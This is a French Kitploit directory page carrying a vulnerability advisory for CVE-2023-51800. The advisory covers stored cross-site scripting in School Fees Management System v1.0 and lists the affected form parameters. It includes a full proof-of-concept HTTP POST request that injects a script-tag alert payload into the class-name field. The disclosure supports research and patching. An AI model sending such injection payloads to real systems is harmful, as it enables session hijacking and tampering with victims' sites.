Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-51800 — De multiples vulnérabilités de script intersite (XSS) dans School Fees Management System v1.0. | Kitploit
Outils/GitHubGitHub/geraldoalcantara/cve-2023-51800
Analyse des VulnérabilitésExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubgeraldoalcantara/cve-2023-51800

CVE-2023-51800

De multiples vulnérabilités de script intersite (XSS) dans School Fees Management System v1.0.

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-51800

School Fees Management System v1.0 - Multiples vulnérabilités de cross-site scripting (XSS)

Description : Multiples vulnérabilités de cross-site scripting (XSS) dans School Fees Management System v1.0.

Version du produit vulnérable : School Fees Management System v1.0
Auteur du CVE : Geraldo Alcântara
Date : 28/11/2023
Confirmé le : 10/12/2023
CVE : CVE-2023-51800
Lien CVE : https://www.cve.org/CVERecord?id=CVE-2023-51800
Lien NVD : https://nvd.nist.gov/vuln/detail/CVE-2023-51800
Lien Tenable : https://www.tenable.com/cve/CVE-2023-51800
Testé sur : Windows

Étapes pour reproduire :

Pour exploiter la vulnérabilité, un utilisateur authentifié disposant des autorisations requises doit se rendre sur l'une des pages concernées et injecter une charge utile malveillante dans l'un des champs sensibles.
Composants affectés :

main_settings - paramètres phone, address, bank, acc_name, acc_number,
new_class - paramètre cname,
add_new_parent - paramètres name, email, new_term - paramètre tname, edit_student - paramètre name



Requête :

root@kitploit:~
Request:
POST /ci_fms/admin/action/new_class HTTP/1.1
Host: 192.168.68.148
Content-Length: 273
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAbJT9XS9eFLU53MR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/management/class
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=gdoj5tr7rsf7ci5o9rpr0rh5eni2r6an
Connection: close

------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cname"

<script>alert(document.domain)</script>
------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cfees"

12,000
------WebKitFormBoundaryAbJT9XS9eFLU53MR--

Découvreur(s)/Crédits :
Geraldo Alcântara

Télécharger l’outil